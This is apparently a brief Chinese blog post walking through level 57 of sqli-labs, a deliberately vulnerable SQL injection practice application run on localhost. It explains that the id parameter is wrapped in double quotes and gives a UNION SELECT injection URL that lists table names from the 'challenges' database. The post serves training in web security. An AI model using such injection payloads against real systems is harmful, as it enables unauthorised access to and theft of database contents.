Sqli-labs less 57

Less-57

 

 

 

 

从代码中看到对id进行了 " " 的处理,所以此处我们构造的payload要进行 "" 的处理,示例payload:

http://127.0.0.1/sqli-labs/Less-57/index.php?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23

 

posted @ 2016-08-11 21:26  lcamry  阅读(407)  评论(0编辑  收藏  举报